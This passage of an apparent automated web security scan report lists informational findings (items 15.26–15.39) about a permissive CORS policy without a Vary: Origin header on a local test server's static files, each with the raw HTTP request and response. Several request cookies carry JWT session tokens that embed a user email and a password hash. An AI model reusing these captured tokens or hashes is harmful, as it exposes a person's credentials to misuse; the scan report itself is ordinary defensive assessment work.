    !function(a,b){"function"==typeof define&&define.amd?define([],fun
    ...[SNIP]...
    15.26. http://192.168.61.143:3000/bower_components/angular-translate/angular-translate.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-translate/angular-translate.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-translate/angular-translate.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Tue, 06 Dec 2016 18:56:59 GMT
    ETag: W/"5cb5-158d57efc78"
    Content-Type: application/javascript
    Content-Length: 23733
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*!
    * angular-translate - v2.13.1 - 2016-12-06
    *
    * Copyright (c) 2016 The angular-translate team, Pascal Precht; Licensed MIT
    */
    !function(a,b){"function"==typeof define&&define.amd?define([],fun
    ...[SNIP]...
    15.27. http://192.168.61.143:3000/bower_components/angular/angular.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular/angular.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular/angular.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Fri, 16 Dec 2016 10:47:07 GMT
    ETag: W/"27d70-159073e17f8"
    Content-Type: application/javascript
    Content-Length: 163184
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    AngularJS v1.5.10
    (c) 2010-2016 Google, Inc. http://angularjs.org
    License: MIT
    */
    (function(y){'use strict';function G(a,b){b=b||Error;return function(){var d=arguments[0],c;c="["+(a?a+":":"")+d
    ...[SNIP]...
    15.28. http://192.168.61.143:3000/bower_components/bootstrap/dist/js/bootstrap.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/bootstrap/dist/js/bootstrap.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/bootstrap/dist/js/bootstrap.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Mon, 25 Jul 2016 15:51:55 GMT
    ETag: W/"90b5-15622c16578"
    Content-Type: application/javascript
    Content-Length: 37045
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*!
    * Bootstrap v3.3.7 (http://getbootstrap.com)
    * Copyright 2011-2016 Twitter, Inc.
    * Licensed under the MIT license
    */
    if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requi
    ...[SNIP]...
    15.29. http://192.168.61.143:3000/bower_components/bootswatch/fonts/glyphicons-halflings-regular.woff2

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/bootswatch/fonts/glyphicons-halflings-regular.woff2

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/bootswatch/fonts/glyphicons-halflings-regular.woff2 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: identity
    Referer: http://192.168.61.143:3000/bower_components/bootswatch/slate/bootstrap.min.css
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close
    If-Modified-Since: Sat, 30 Jul 2016 21:56:26 GMT
    If-None-Match: W/"466c-1563dceeb10"

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 30 Jul 2016 21:56:26 GMT
    ETag: W/"466c-1563dceeb10"
    Date: Sun, 15 Jan 2017 21:04:26 GMT
    Connection: close

    15.30. http://192.168.61.143:3000/bower_components/clipboard/dist/clipboard.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/clipboard/dist/clipboard.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/clipboard/dist/clipboard.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Mon, 12 Dec 2016 13:54:35 GMT
    ETag: W/"282e-158f3504978"
    Content-Type: application/javascript
    Content-Length: 10286
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*!
    * clipboard.js v1.5.16
    * https://zenorocha.github.io/clipboard.js
    *
    * Licensed MIT © Zeno Rocha
    */
    !function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();els
    ...[SNIP]...
    15.31. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/cn.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/cn.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/cn.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"350-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 848
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" height="480" width="640" viewBox="0 0 640 480">
    <defs>
    <path id="a" fill="#ffde00" d="M-.588.81L0-1 .588.81-.95
    ...[SNIP]...
    15.32. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/de.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/de.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/de.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"dc-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 220
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <path fill="#ffce00" d="M0 320h640v160.002H0z"/>
    <path d="M0 0h640v160H0z"/>
    <path fill="#d00" d="M0 160h6
    ...[SNIP]...
    15.33. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/ee.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/ee.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/ee.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"144-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 324
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd" stroke-width="1pt">
    <rect rx="0" ry="0" height="477.9" width="640"/>
    <rect rx="
    ...[SNIP]...
    15.34. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/es.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/es.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/es.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"2372c-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 145196
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <path fill="#c60b1e" d="M0 0h640v480H0z"/>
    <path fill="#ffc400" d="M0 120h640v240H0z"/>
    <path d="M127.27 2
    ...[SNIP]...
    15.35. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/fi.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/fi.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/fi.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"fd-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 253
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <path fill="#fff" d="M0 0h640v480H0z"/>
    <path fill="#003580" d="M0 174.545h640v130.909H0z"/>
    <path fill="#
    ...[SNIP]...
    15.36. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/fr.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/fr.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/fr.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"12d-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 301
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd" stroke-width="1pt">
    <path fill="#fff" d="M0 0h640v480H0z"/>
    <path fill="#00267f
    ...[SNIP]...
    15.37. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/gr.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/gr.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/gr.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"333-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 819
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <defs>
    <clipPath id="a">
    <path fill-opacity=".67" d="M0 0h120v90H0z"/>
    </clipPath>
    </defs>
    <
    ...[SNIP]...
    15.38. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/it.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/it.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/it.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"13d-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 317
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd" stroke-width="1pt">
    <path fill="#fff" d="M0 0h640v479.997H0z"/>
    <path fill="#00
    ...[SNIP]...
    15.39. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/jp.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/jp.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/jp.svg HTTP/1.1
